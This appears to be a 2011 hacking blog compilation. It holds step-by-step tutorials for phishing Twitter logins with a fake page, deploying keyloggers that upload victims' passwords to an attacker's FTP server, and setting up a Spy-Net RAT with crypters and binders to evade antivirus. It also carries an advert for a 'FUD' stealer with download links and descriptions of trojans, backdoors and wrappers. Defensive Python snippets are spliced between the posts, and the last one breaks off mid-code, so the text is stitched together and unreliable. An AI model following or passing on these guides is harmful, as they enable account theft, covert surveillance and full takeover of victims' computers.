Friday, April 29, 2011

TwitterPasswordDecryptor – Instantly Recover Twitter Account Passwords

TwitterPasswordDecryptor is a free tool that instantly recovers Twitter account passwords stored by popular web browsers. Most web browsers store the login credentials for visited websites so that the user does not have to remember and enter the password every time. Each browser uses its own proprietary encryption mechanism to store these login passwords, including Twitter account passwords. TwitterPasswordDecryptor automatically crawls through each of these browsers and recovers all of the stored Twitter passwords.
TwitterPasswordDecryptor comes in both a GUI and a command-line version; the latter is more useful to penetration testers. Apart from ordinary users, who can use it to recover a lost password, it can be handy for forensic investigators, who can retrieve any stored Twitter account passwords and use that Twitter profile information to extend their investigation.

TwitterPasswordDecryptor is a fully portable tool that can be run directly from anywhere without installing it locally. It also comes with an installer for those who want to install it and use it regularly. It works on a wide range of platforms, from Windows XP to the latest Windows 7.
Features
Currently supports recovering stored Twitter account passwords from the following popular browsers:

  • Internet Explorer (all versions from 4 to 8)
  • Firefox
  • Google Chrome
  • Opera Browser
You can download TwitterPasswordDecryptor here:
TwitterPasswordDecryptor.zip
Source: Darkside

How To Hack Facebook/Myspace/Orkut Or Any Email

How To Hack Facebook/Myspace/Orkut Or Any Email By Keylogging
Fud Long Time


Rapzo Logger v 1.5 ( Public Edition )By Rapid

[Image: 92564171.jpg]



" Virus Results By Scan4you.net 0/32 "(Paid Host )


[Image: 78831054.jpg]

Options


[Image: op2wo.jpg]

Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD

[#] Firefox 3.5.0-3.6.X
[#] DynDns
[#] FileZilla
[#] Pidgin
[#] Imvu
[#] No-Ip

Features [25]

* Full UAC Bypass & Faster Execution
* Coded in VB.NET
* Minimum requirement is .NET 2.0; nowadays every PC has it
* Cool & user-friendly GUI
* Easily understandable
* Encrypt information
* Encrypt e-mail information
* 100% FUD from all AVs
* 4 extensions [ .exe | .scr | .pif | .com ]
* Keylogger support - SMTP [Gmail, Hotmail, Live, AOL]
* Test e-mail - is it valid or not
* Customize the "To" e-mail address
* Screen logger
* Cure.exe to remove server from your computer
* USB spreader
* File pumper - built-in
* Icon changer - preview
* Logs are nice and clear
* Log letters - ABCD etc.
* Log symbols - !@#$% etc.
* Log numbers - 12345 etc.
* Log specific keys - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. etc.
* Hidden really well & invisible
* Send new logs over and over again
* ReadMe.txt - how to use
* Video tutorial - how to use
Working on all Windows operating systems - [WinXP\Vista\W7] --- [32 + 64] bit computers


Stealer Logs:

[Image: fine2.jpg]

[Image: fineh.jpg]

Who Wanna Change Assembly See This

[Image: asm.gif]

Download Links


http://www.mediafire.com/?belchwxdl6z2xl9

http://akenload.com/download/141/RapZo_L..._.rar.html

http://www.megaupload.com/?d=IFRRHPBX

http://rapidshare.com/files/418946168/Ra...tion__.rar



By Rapidguide From Hacker world Blog

Hack Facebook/Twitter Or Any Email Account With Session Hijacking

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.
It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.
This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.
Firesheep is a Firefox extension designed to demonstrate just how serious this problem is.
After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.
As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed.
Double-click on someone, and you're instantly logged in as them.
That's it.
Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.
By sarvesh
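The weakness the post describes is a session cookie that is issued without the Secure attribute, so the browser also sends it on plain HTTP requests where anyone on the same open network can copy it. The Python below is an added example, not part of the original post or of Firesheep: it audits Set-Cookie headers for that mistake and builds the hardened header a site should send instead. The responses, the host example.test and the set of cookie names treated as session identifiers are constructed assumptions for the demonstration.

```python
"""Audit Set-Cookie headers for the weaknesses that make sidejacking possible.

A session cookie sent without the Secure attribute is also transmitted on plain
HTTP requests, so anyone sniffing an open wireless network can copy and reuse
it. HttpOnly additionally keeps the cookie out of reach of page scripts.
All responses below are constructed samples, not captured from any real site.
"""

# Constructed sample responses: the same login endpoint over HTTP and HTTPS.
SAMPLE_RESPONSES = {
    "http://example.test/login": [
        "Set-Cookie: sessionid=abc123; Path=/",   # weak: no Secure, no HttpOnly
        "Set-Cookie: lang=en; Path=/",            # harmless preference cookie
    ],
    "https://example.test/login": [
        "Set-Cookie: sessionid=abc123; Path=/; Secure; HttpOnly",
    ],
}

# Cookie names treated as session identifiers (assumption for this example).
SESSION_COOKIE_NAMES = {"sessionid", "session", "sid", "auth"}


def parse_set_cookie(header):
    """Return (cookie name, set of lower-cased attribute names) for one header."""
    value = header.split(":", 1)[1].strip()
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return name, attrs


def audit_cookies(url, headers):
    """List (cookie, problem) pairs for session cookies set by this response."""
    findings = []
    for header in headers:
        name, attrs = parse_set_cookie(header)
        if name.lower() not in SESSION_COOKIE_NAMES:
            continue                      # only session cookies matter here
        if not url.lower().startswith("https://"):
            findings.append((name, "set over plain HTTP"))
        if "secure" not in attrs:
            findings.append((name, "missing Secure attribute"))
        if "httponly" not in attrs:
            findings.append((name, "missing HttpOnly attribute"))
    return findings


def hardened_set_cookie(name, value):
    """Build the Set-Cookie header a site should send for its session cookie."""
    return f"Set-Cookie: {name}={value}; Path=/; Secure; HttpOnly"


if __name__ == "__main__":
    for url, headers in SAMPLE_RESPONSES.items():
        problems = audit_cookies(url, headers)
        print(url, "->", problems or "no session-cookie problems")
    print(hardened_set_cookie("sessionid", "abc123"))
```

The Secure attribute only helps if the whole site is served over HTTPS; if any page is still reachable over HTTP the browser will not send the cookie there, and the site will either break or silently fall back to issuing an unprotected one.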

How to hack twitter accounts


Hack twitter accounts


Twitter is one of the most widely used social networking sites; its Alexa ranking is 14 (as of now). So it is increasingly becoming a target of hackers. Many requests keep coming to me asking for a way to hack Twitter accounts, so today I have written a post on how to hack Twitter accounts.

For this purpose I will describe the most used method to hack Twitter accounts, i.e. phishing.



How to hack twitter accounts - Phishing



First of all download:Twitter fake login page

Step 1
First extract the contents into a folder

Step 2
Then edit login.php (right-click and then select Edit).

In it, find (CTRL+F) 'http://www.adnan.com.co.in' and change it to your destined URL, but don't forget the '\'.

Now rename the script to pass.php and save it

Step 3
Now open the Twitter fake page in WordPad and search for the term action=; change it to action=pass.php

Step 4
Create an account at www.110mb.com, because I know that site quite well.

Step 5
Then upload the contents into a directory

Step 6
For that,after creating an id you should go to file manager and upload all these files.

Step 7
Then just go to your fake page, enter a username and password and try out whether it's working.

Step 8
After you submit the form, a password file will be created in the same directory.

Step 9
Then you can see what username and password you have entered.

Now you are ready to hack twitter accounts

Step 10

Distribute the Yahoo.HTML URL (i.e. yoursite.com/yahoo.HTML) to your friends. When they log in from this fake login page, login.php will save the username and password into the .TXT file (or any other format) on your site. Download the file to see the password inside it.

Weak Password Brings ‘Happiness’ to Twitter Hacker

An 18-year-old hacker with a history of celebrity pranks has admitted to Monday’s hijacking of multiple high-profile Twitter accounts, including President-Elect Barack Obama’s, and the official feed for Fox News.

The hacker, who goes by the handle GMZ, told Threat Level on Tuesday he gained entry to Twitter’s administrative control panel by pointing an automated password-guesser at a popular user’s account. The user turned out to be a member of Twitter’s support staff, who’d chosen the weak password "happiness."

Cracking the site was easy, because Twitter allowed an unlimited number of rapid-fire log-in attempts.


The hacker bragged about the hack and revealed that it was a brute force dictionary attack against an administrator account. Twitter does not block repetitive login failures therefore enabling brute force attacks. We are still leaving the incident classification "insufficient authentication" in addition to brute force as we feel an administration interface should have additional authentication mechanism and not just a password.

Twitter announced that a hacker broke into 33 accounts, including Obama's now-inactive Twitter account. The hack was the result of a flaw in a web-based support tool used by Twitter, which was evidently accessible externally without proper authorization.

So Twitter accounts could be hacked using brute-force dictionary attacks.
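The incident turned on two things the article names: a weak password and a login that allowed unlimited rapid-fire attempts. The Python below is an added example, not code from Twitter or from the article, showing the second half of the fix: a per-account failure counter that locks the account for a period once a threshold is hit, so an automated password-guesser is refused long before it reaches a word like "happiness". The account name, guess list and clock values are constructed for the demonstration.

```python
"""Throttle failed logins so an automated password guesser cannot run
unlimited rapid-fire attempts against one account.

Added example: a per-account failure counter with a temporary lockout. The
caller performs its normal credential check and only tells the throttle
whether the password matched; the throttle never sees passwords. The account
name, guess list and clock values below are constructed for the demonstration.
"""
import time
from collections import defaultdict


class LoginThrottle:
    def __init__(self, max_failures=5, lockout_seconds=900):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self._failures = defaultdict(int)   # account -> consecutive failures
        self._locked_until = {}             # account -> monotonic time

    def is_locked(self, account, now):
        until = self._locked_until.get(account)
        return until is not None and now < until

    def attempt(self, account, password_ok, now=None):
        """Return 'locked', 'ok' or 'failed' for one login attempt."""
        now = time.monotonic() if now is None else now
        if self.is_locked(account, now):
            return "locked"          # refused regardless of the password offered
        if password_ok:
            self._failures.pop(account, None)
            self._locked_until.pop(account, None)
            return "ok"
        self._failures[account] += 1
        if self._failures[account] >= self.max_failures:
            self._locked_until[account] = now + self.lockout_seconds
            self._failures.pop(account, None)   # count restarts after lockout
        return "failed"


def simulate_guessing(throttle, account, guesses, real_password, start=0.0):
    """Replay a list of guesses one second apart; return the outcome of each."""
    return [
        throttle.attempt(account, guess == real_password, now=start + i)
        for i, guess in enumerate(guesses)
    ]


if __name__ == "__main__":
    throttle = LoginThrottle(max_failures=5, lockout_seconds=900)
    # Constructed guess list; the real (weak) password is the last entry.
    guesses = ["password", "123456", "letmein", "qwerty", "welcome", "summer", "happiness"]
    print(simulate_guessing(throttle, "support-staff", guesses, "happiness"))
```

A per-account lockout on its own lets anyone lock a legitimate user out by deliberately failing, so in practice it is paired with per-source throttling, and, as the article argues for administrative interfaces, with an authentication factor beyond the password.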


Hack Yahoo,Hotmail,Myspace,MSN account passwords



Hello friends, here is one more tutorial about hacking Facebook, Hotmail, Yahoo, Gmail, Twitter, Orkut, MySpace and MSN accounts, as easy as 1 2 3. In my previous article, I mentioned the Armadax keylogger for hacking Hotmail, Yahoo, MySpace and MSN account passwords.
Today I am introducing a very effective keylogger, namely the Vicspy keylogger, which I found extremely good and user-friendly for hacking Hotmail and Yahoo account passwords. I have provided the link for the software download and the password ... So enjoy and let's begin the tutorial.

Hacking Facebook,hotmail,Yahoo,Gmail,Twitter,orkut,myspace and msn Passwords


1. Download Vicspy keylogger for hacking Hotmail, Yahoo, msn ,myspace ,Face book And Gmail account passwords.

2. Extract the Rar to obtain Vicspy keylogger.

3. Simply run peditor.exe to get key logger interface and create a key logger for hacking hotmail, yahoo and msn account password. No need to install software on computer.


4. Now, in Servers , fill in the FTP server which you wanna use to receive logs from keylogger.

Fill in ftp server as:

where:
# user: your username at ftp server.
# pass: your password.
# logs: create a new folder named "logs" at your ftp server. You will receive hotmail, yahoo and msn hacked passwords in this folder.
# ftp.example.com : your ftp server address. (eg: ftp.drivehq.com for drivehq ftp server)

After you have completed filling ftp server, hit on "Check" just adjacent to it to check whether you have entered ftp server correctly and whether server is available.

5.
In Control, check "Melt" to make key logger evaporate after installation on victim computer.

6. Additional Options included in Vicspy key logger are that you can
- Change keylogger file icon
- Bind key logger with another file to make it undetectable by victim.

7. Now, simply choose the path where you want key logger to be saved and hit on "Create" to create key logger file at preferred destination.

8. Now, send this file to your victim and get him to install this bound keylogger file on his computer (social engineering). You can crypt this keylogger file and then use a fake error message generator to make the keylogger undetectable by antivirus.

Once the victim installs key logger on his computer, you will start receiving all typed passwords on his computer in your FTP server account (in logs folder). Thus, our target of hacking hotmail, yahoo, msn account password accomplished.

That's ALL About Vicspy Key logger for hacking Facebook,hotmail,Yahoo,Gmail,Twitter,orkut,myspace and msn account passwords. Vicspy keylogger can also be used for hacking other email account passwords.

Hack Your Victim Fully

Ok Guys Nows Your Day Today Hope its Good ,Well Em Going to Post A Tut For My Fans Coz  all are Requesting Again & Again so Here is the tut Begin
Author : Mr.MindfReak
Title : Hacked Your Victim Fully [Totally]
Our Blog : http://hackguide4u.blogspot.com

Description[Read Carefully]:
Ok So The Trick From Which You Are Going to Learn "Title : Hacked Your Victim Fully [Totally]" Is Called 'Rat' 
Rat:''Remote Administrative Tool''

So for using a RAT you need a special thing, which is an ''Open Port'', which you can open on your router; see below how to port forward and make an "Open Port"
Note: "If you don't have a router to open a port, use a VPN, because a VPN opens all ports"

Ok So how To Setup Rat see,

First you need to download these two files:

No-ip DUC : DOWNLOAD
Spy-Net RAT: DOWNLOAD [Password is Spy-Net]

Second We Need To Setup No-ip Account: 
1. Go to www.no-ip.com
2. Create a new account
3. Confirm it from your E-Mail
4. Login To No-IP website
5. Select Add a host
6. Click Create Host
7. Write what you want the name of your No-IP address to be

[Image: igQE.png]
8. Click Create Host
9. Download No-IP DUC , Install it , then login with your Email and password.
10. Once you do You will see your server there. Click on the icon and it will be smiling. (:D)


Port forwarding.

I Will not explain that much ,
1. Go to http://www.portforward.com
2. Click CTRL+F 
3. Select Your Router

4. Follow the guide and do this with the port 81


Now How to Setup SpyNet[Rat]

[Image: spynet26989.png]

1.First of all , Open the Spy-Net , you will get a popup with some weird language , click NO.
2.On Spy-Net , click START and then Opces -> Idioma -> English.ini (thats for changing language of spynet , Default is spanish or something)

Okay so now , I uploaded pics for it to be easier.

1.Go to File -> Create Server -> Select any of the profiles

Connection
[Image: icvK1s.png]

Where it says "Your_Dns_here", click once on it and click DELETE. Then click ADD and write your No-IP address, and click Add or OK, I don't know what it was.

Installation
[Image: icvM90.png]

Leave everything as it is... ( these the options i use personally)

KeyLogger
[Image: icvSXO.png]

Okay , so i guess everyone wants the keylogger , so select it.
And i prefer using the Backspace option too , as if someone logins to facebook , and his email is mrmindfreak@hotmail.com , and he misspelled something and it showed as mrmindfreak@hotmail.com , im sure he will use backspace and fix it , so this will be recorded on your keylogger and you can get the passwords easier :)

Anti-Debug
[Image: icv1qi.png]

Okay select all of them , if you want to test it on sandboxie , unselect the first one :)

Final Step
[Image: icrzVc.png]

Choose anything you want; for changing the icon click on the picture icon there and select any .exe or .ico file... Then click on Create Server. You're done. Now give your server to your victim, and when he opens it you will get his PC on the RAT like the pic below.

[Image: spynet26989.png]
Note: Your server is detectable because it's a Trojan, so make it FUD by using some crypters, bind it and spread it. You can search for a binding tut on the blog.

Tools and Softwares for Trojans and Backdoors

Tool: QAZ


  • It is a companion virus that can spread over the network.

  • It also has a "backdoor" that will enable a remote user to connect to and control the computer using port 7597.

  • It may have originally been sent out by email.

  • Renames notepad to note.com

  • Modifies the registry key:
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Hacking Tool:Tini


  • It is a very tiny trojan program which is only 3 kb and programmed in assembly language. It takes minimal bandwidth to get on victim's computer and takes small disk space.

  • Tini only listens on port 7777 and runs a command prompt when someone attaches to this port. The port number is fixed and cannot be customized. This makes it easier for a victim system to detect by scanning for port 7777.

  • From a tini client you can telnet to tini server at port 7777
Tool: Netcat



  • Outbound or inbound connections, TCP or UDP, to or from any ports

  • Ability to use any local source port

  • Ability to use any locally-configured network source address

  • Built-in port-scanning capabilities, with randomizer

  • Built-in loose source-routing capability
Tool: Donald Dick


Donald Dick is a tool that enables a user to control another computer over a network.
It uses a client-server architecture with the server residing on the victim's computer.
The attacker uses the client to send commands through TCP or SPX to the victim listening on a predefined port.
Donald Dick uses default port 23476 or 23477.
Tool: SubSeven



  • SubSeven is a backdoor program that enables others to gain full access to Windows 9x systems through network connection.

  • The program consists of three different components : Client (SubSeven.exe), Server (Server.exe) and a Server configuration utility (EditServer.exe).

  • The client is a GUI used to connect to server through a network or internet connection.
Since its debut in February, 1999, SubSeven has become a favorite tool of intruders targeting Windows machines.
It is a RAT (Remote Administration Tool) that provides more options for attack than other Trojans like Back Orifice or NetBus. The SubSeven Trojan consists of three programs: the SubSeven server, client and server editor. It has DDoS potential and, like other Trojans, SubSeven can be used as a perfectly benign remote administration program.
The server must be run on the target computer to allow the attacker's computer to connect to the machine and have total access to it. The server editor (EditServer Program) helps configure the infection characteristics. This allows the hacker to specify whether the compromised system should send an email or ICQ notification to the attacker when the target is online, whether the program should "melt server after installation" and which ports the attacker can use to connect to the server. Once installed, SubSeven's friendly user-interface allows the attacker to easily monitor a victim's keystrokes, watch a computer's web cam, take screen shots, eavesdrop through the computer's microphone, control the mouse pointer, read and write files, and sniff traffic off the victim's local network.

Tool: Back Orifice 2000
Back Orifice accounts for highest number of infestations on Microsoft computers.
The BO2K server code is only 100KB. The client program is 500KB.
Once installed on a victim PC or server machine, BO2K gives the attacker complete control of the system.
BO2K has stealth capabilities, it will not show up on the task list and runs completely in hidden mode.
BO2K was written by DilDog of the Cult of the Dead Cow. Many of the commands that B02K comes with were directly ported from Sir Dystic's original Back Orifice source code. The document says that it was written with a two-fold purpose: "To enhance the Windows operating system's remote administration capability and to point out that Windows was not designed with security in mind."
B02K is an almost complete rewrite of the original Back Orifice. By default, B02K comes with the capability to talk over TCP as well as UDP, and supports strong encryption through plug-ins. It has added functionality in the areas of file transfer and registry handling. It has hacking features, such as dumping certain cached passwords. It can be configured to be stealthy.
Like other Trojans, Back Orifice is a client/server application which allows the client software to monitor, administer, and perform other network and multimedia actions on the machine running the server. To communicate with the server, either the text based or GUI client can be run on any Microsoft Windows machine.
The B02K server installed without any plugins is ~100K and leaves a small footprint. The client software is ~500K. The whole suite will fit on a single 1.44MB floppy disk. B02K 1.0 will currently run on Windows 95, Windows 98, Windows ME, Windows NT, Windows 2000, and Windows XP systems. All of the various parts of the BO2K suite have been tested and found to be working on all of these platforms. It only runs on Intel platforms at the moment.
Back Orifice Plug-ins


  • BO2K functionality can be extended using BO plug-ins.

  • BOPeep (Complete remote control snap in)

  • Encryption (Encrypts the data sent between the BO2K GUI and the server)

  • BOSOCK32 (Provides stealth capabilities by using ICMP instead of TCP UDP)

  • STCPIO (Provides encrypted flow control between the GUI and the server, making the traffic more difficult to detect on the network)

BO Peep - This plugin gives you a streaming video of the machine's screen that the server is running on. Also provides remote keyboard and mouse accessibility.
Serpent Encryption - This is a very fast implementation of the non-export-restricted 256 bit-SERPENT encryption algorithm.
CAST-256 Encryption - This internationally available plugin provides strong encryption using the CAST-256 algorithm.
IDEA Encrypt - This internationally available plugin provides strong encryption using the IDEA algorithm. 128 Bit Encryption.
RC6 Encryption - This internationally available plugin provides strong encryption using the RC6 algorithm. Provides 384 bit encryption.
STCPIO - TCPIO communications plugin with an encrypted flow control system to make BO2K TCP traffic virtually impossible to detect.
Rattler notifies a specified user as to the whereabouts of a Back Orifice 2000 server via e-mail. Rattler will send an e-mail each time it detects an IP address addition/modification.
rICQ is a plugin for Back Orifice 2000 that operates in a similar fashion to Rattler except that the notification message is sent via ICQ's web pager service.
The Butt Trumpet 2000 plugin for BO2K, once installed and started, sends you an email with the host's IP address. A nice alternative to Rattler.
BoTool provides a graphical file browser and registry editor to the BO2K interface. Makes common tedious BO2K tasks point-and-click simple.

Tool: NetBus
NetBus was written by a Swedish programmer, Carl-Fredrik Neikter, in March 1998. Version 1.5 in English appeared in April. NetBus apparently received little media attention but it was in fairly wide use by the time BO was released on 3 August.
NetBus consists of two parts: a client program ("netbus.exe") and a server program often named "patch.exe" (or "SysEdit.exe" with version 1.5x), which is the actual backdoor. Version 1.60 uses TCP/UDP port 12345, which can't be altered. From version 1.70 onward the port can be configured. If it is installed by a "game" called "whackamole" (file name: "whackjob.zip", which contains the NetBus 1.53 server) its name is "explore.exe". There is also a file called whackjob17.zip, which installs the server of NetBus 1.70 and uses port 12631. Additionally it is password protected (PW: "ecoli"). The NetBus server is installed by "game.exe" during the setup routine; the name of the server is actually "explore.exe", located in the Windows directory.
To start the server automatically, there is an entry in the registry at "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", normally used with the option "/nomsg". If this entry is deleted, the server won't be started with Windows.
The NetBus server is about 4 times as large as the Back Orifice server, and generally less "stealthy." Unlike BO, NetBus is not designed to attach virus-like to legitimate files or applications.
Like BO, the NetBus server can have practically any filename. The usual way it is installed is through simple deception; the program is sent to the victim, or offered on a website, and falsely represented as something it is not. Occasionally it may be included in a setup package for a legitimate application and executed in the process of that setup.
The unsuspecting victim runs the program either directly or by way of the application used as camouflage, and it immediately installs itself and begins to offer access to intruders.
NetBus will always reveal its presence by way of an open port, viewable with netstat.exe. Because of this, many intruders delete netstat.exe from the victim's hard drive immediately upon gaining access. Creating a copy or two of netstat using other names is a good precaution against its loss. A regular check for the presence of netstat.exe, including the file's size and date, is advisable and is one means of spotting intrusions. Attackers may use BO as a means of installing Netbus on the target system. This is because NetBus is sophisticated yet easy to use.
Once access is gained, the intruder will often install other backdoors, ftp or http daemons which open victim's drive(s) to access or he may enable resource sharing on the Net connection
The v1.53 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number.
NetBus v1.53 is not extremely stealthy, but it is certainly functional and effective.
This utility also has the ability to scan "Class C" addresses by adding "+Number of ports" to the end of the target address. Example: 255.255.255.1+254 will scan 255.255.255.1 through 255.255.255.255.
By default, the v1.60 server is named Patch.exe. It may be renamed. Its size is 461K (472,576 bytes). When this program is run, it remains where it is and nothing appears to happen. Unlike v1.53, it can then be deleted uneventfully. However, it is functional. It copies itself to the Windows directory, extracts from within itself a file called KeyHook.dll and activates both programs.
Run without added parameters, v1.60 is persistent; that is, it will execute on its own when the computer is restarted. It makes changes to the Registry; it creates the keys
HKEY_CURRENT_USER\PATCH, where PATCH is the filename before the extension; and by default, it places a value in the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Version 1.60, like v1.53, also creates the Registry keys
HKEY_CURRENT_USER\NETBUS; and HKEY_CURRENT_USER\NETBUS\Settings and places basically the same series of values in the Settings key.
The v1.60 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number.
Among the new features are greatly expanded file-handling capabilities, an interactive message dialog, password setting and other server controls, and new ways to tamper with the keyboard. Most of its tricks are evident from this console display.
Netbus 1.7 was released to the public on 11/14/98. It is basically the same program as version 1.6, but with an ultra-fast port scanner, capable of redirecting data to another host and port, option to configure the server-exe with some options, like TCP-port and mail notification, ability redirect I/O from console applications to a specified TCP-port and restricting access to only a few IP-numbers.
By default, the v1.70 server is named Patch.exe. It may be renamed. Its default size is 483K (494,592 bytes). With configuration added, its size increases, usually by a couple of hundred bytes. By default, the v1.70 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number. It can however be readily configured to use any other virtual port from 1 to 65534. The port configuration can be pre-set by the sender, and/or it can be changed from remote. It will also open the next-numbered port in sequence, which it apparently uses for responses to the client.
"NetBus 2.0 Pro" (often just called "NetBus 2.0"), the latest version of this well-known backdoor program, has been released after Spector took over NetBus. Therefore the new version is shareware and needs the remote user's permission for installation. However, hackers have released variations such as Retail_10.exe, which fakes an incomplete patch of ICQ. Instead it installs the "NetBus 2.0 Server" in invisible and auto-starting mode. It even deletes the data logged by the server.
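Several of the backdoors above announce themselves through a fixed or default listening port, and the NetBus section points out that netstat.exe is what reveals it. The Python below is an added example, not part of this page or of any of the tools it describes: it parses the text of `netstat -an` as Windows prints it and flags listening TCP ports that match the port numbers given on this page for QAZ, Tini, Donald Dick and NetBus. The netstat output is a constructed sample, not captured from a real machine.

```python
"""Flag listening TCP ports that match the fixed or default ports of the
backdoors described above (QAZ, Tini, Donald Dick, NetBus).

Added example: parses the text of `netstat -an` as Windows prints it. The
output below is a constructed sample, not captured from a real machine.
"""

# Port -> backdoor, taken from the descriptions on this page.
KNOWN_BACKDOOR_PORTS = {
    7597: "QAZ",
    7777: "Tini",
    12345: "NetBus 1.x (client port)",
    12346: "NetBus 1.x (response port)",
    12631: "NetBus 1.70 via whackjob17",
    23476: "Donald Dick",
    23477: "Donald Dick",
}

# Constructed sample of `netstat -an` output on a Windows host.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12346          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1044      203.0.113.5:80         ESTABLISHED
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING
  UDP    0.0.0.0:137            *:*
"""


def parse_netstat(text):
    """Return (proto, local_addr, local_port, state) for each socket line."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue                      # header, blank or unrelated line
        proto, local = parts[0], parts[1]
        state = parts[3] if len(parts) > 3 else ""   # UDP lines carry no state
        addr, _, port = local.rpartition(":")        # also handles "[::]:135"
        rows.append((proto, addr, int(port), state))
    return rows


def find_known_backdoor_ports(rows):
    """Return (port, backdoor name) for listening TCP ports in the table."""
    return [
        (port, KNOWN_BACKDOOR_PORTS[port])
        for proto, _addr, port, state in rows
        if proto == "TCP" and state == "LISTENING" and port in KNOWN_BACKDOOR_PORTS
    ]


if __name__ == "__main__":
    for port, name in find_known_backdoor_ports(parse_netstat(SAMPLE_NETSTAT)):
        print(f"port {port} is listening: matches {name}")
```

A port match is an indicator, not proof: a legitimate service can use the same number, and NetBus 1.70 can be configured to listen anywhere from 1 to 65534. Confirm a hit by identifying the owning process and by checking the Run key the page names, and, since the page notes that intruders delete netstat.exe after gaining access, run a copy of netstat from known-good media rather than the one on the suspect disk.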

Trojans and Backdoors - 5 :Wrappers



Wrappers



  • How does an attacker get BO2K or any trojan installed on the victim's computer? Answer: Using Wrappers


  • A wrapper attaches a given EXE application (such as a game or office application) to the BO2K executable.


  • The two programs are wrapped together into a single file. When the user runs the wrapped EXE, it first installs BO2K and then runs the wrapped application.


  • The user only sees the latter application.

Wrappers are used to bind the Trojan executable with a legitimate file. The attacker can compress any (DOS/WIN) binary with tools like "petite.exe". This tool decompresses an exe file (once compressed) at runtime. This makes it possible for the Trojan to get in virtually undetected, as most antivirus products are not able to detect the signatures in the file.
The attacker can place several executables to one executable as well. These wrappers may also support functions like running one file in the background while another one is running on the desktop.
Technically speaking though, wrappers can be considered to be another type of software "glueware" that is used to attach together other software components. A wrapper encapsulates a single data source to make it usable in a more convenient fashion than the original unwrapped source.
Users can be tricked into installing Trojan horses by being enticed or frightened. For example, a Trojan horse might arrive in email described as a computer game. When the user receives the mail, they may be enticed by the description of the game to install it. Although it may in fact be a game, it may also be taking other action that is not readily apparent to the user, such as deleting files or mailing sensitive information to the attacker.
Graffiti.exe is an example of a legitimate file that can be used to drop the Trojan into the target system. This program runs as soon as windows boots up and on execution keep the user distracted for a given period of time by running on the desktop.
Tool: EliteWrap



  • Elite Wrap is an advanced EXE wrapper for Windows 95/98/2K/NT used for SFX archiving and secretly installing and running programs.


  • With EliteWrap one can create a setup program that would extract files to a directory and execute programs or batch files to display help, copy files, etc.
Icon Plus is a conversion program for translating icons between various formats. Icon Plus now can read and save Windows XP icons. Icon Plus can also be worked at from the command prompt. This kind of application can be used by an attacker to disguise his malicious code or Trojan so that users are tricked into executing it.
There are numerous icon libraries available on the Internet that allows a user to change icons to suit various operating systems by aping their look and feel.
Tool: Restorator


It is a versatile skin editor for any Win32 programs: change images, icons, text, sounds, videos, dialogs, menus, and other parts of the user interface. Using this one can create one's own User-styled Custom Applications (UCA).
The relevance of discussing this tool here arises from its ability to modify the user interface of any Windows 32-bit program and thus create UCA's. The user can view, extract, and change images, icons, text, dialogs, sounds, videos, menus and much more.
Infecting via CD-ROM



  • When you place a CD in your CD-ROM drive, it automatically starts with some setup interface. An Autorun.inf file placed on such CDs is responsible for this action and looks like this:
    [autorun]
    open=setup.exe
    icon=setup.exe


  • Therefore it is quite possible that while running the real setup program a trojan could be run very easily.


  • Turn off the Auto-Start functionality by doing the following:
    Start button-> Settings-> Control Panel-> System-> Device Manager-> CDROM-> Properties -> Settings 
The Autorun.inf file placed on such CDs can be configured to execute the Trojan, which makes it possible to infect a machine while the real setup program is running. It looks like this:
    [autorun]
    Open=setup.exe
    Icon=setup.exe
The countermeasure is to disable the auto-start functionality: Start Button -> Settings -> Control Panel -> System -> Device Manager -> CDROM -> Properties -> Settings, then turn off "Auto Insert Notification".
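The following is an added example, not part of the original course material: a small Python triage script that parses an autorun.inf of the kind shown above and reports what the disc would launch versus the file whose icon the user is shown. The sample files are constructed; shellexecute= and shell\<verb>\command= are further real autorun.inf launch directives that the text does not mention.

```python
"""Triage an autorun.inf before letting a disc or removable drive auto-run.

Added example, not from the original course material: lists every directive
that would launch a program and compares it with the file whose icon the user
is shown. Sample autorun.inf contents below are constructed.
"""
import ntpath

# open= and icon= appear in the text above; shellexecute= and
# shell\<verb>\command= are further real autorun.inf launch directives.
LAUNCH_KEYS = {"open", "shellexecute"}

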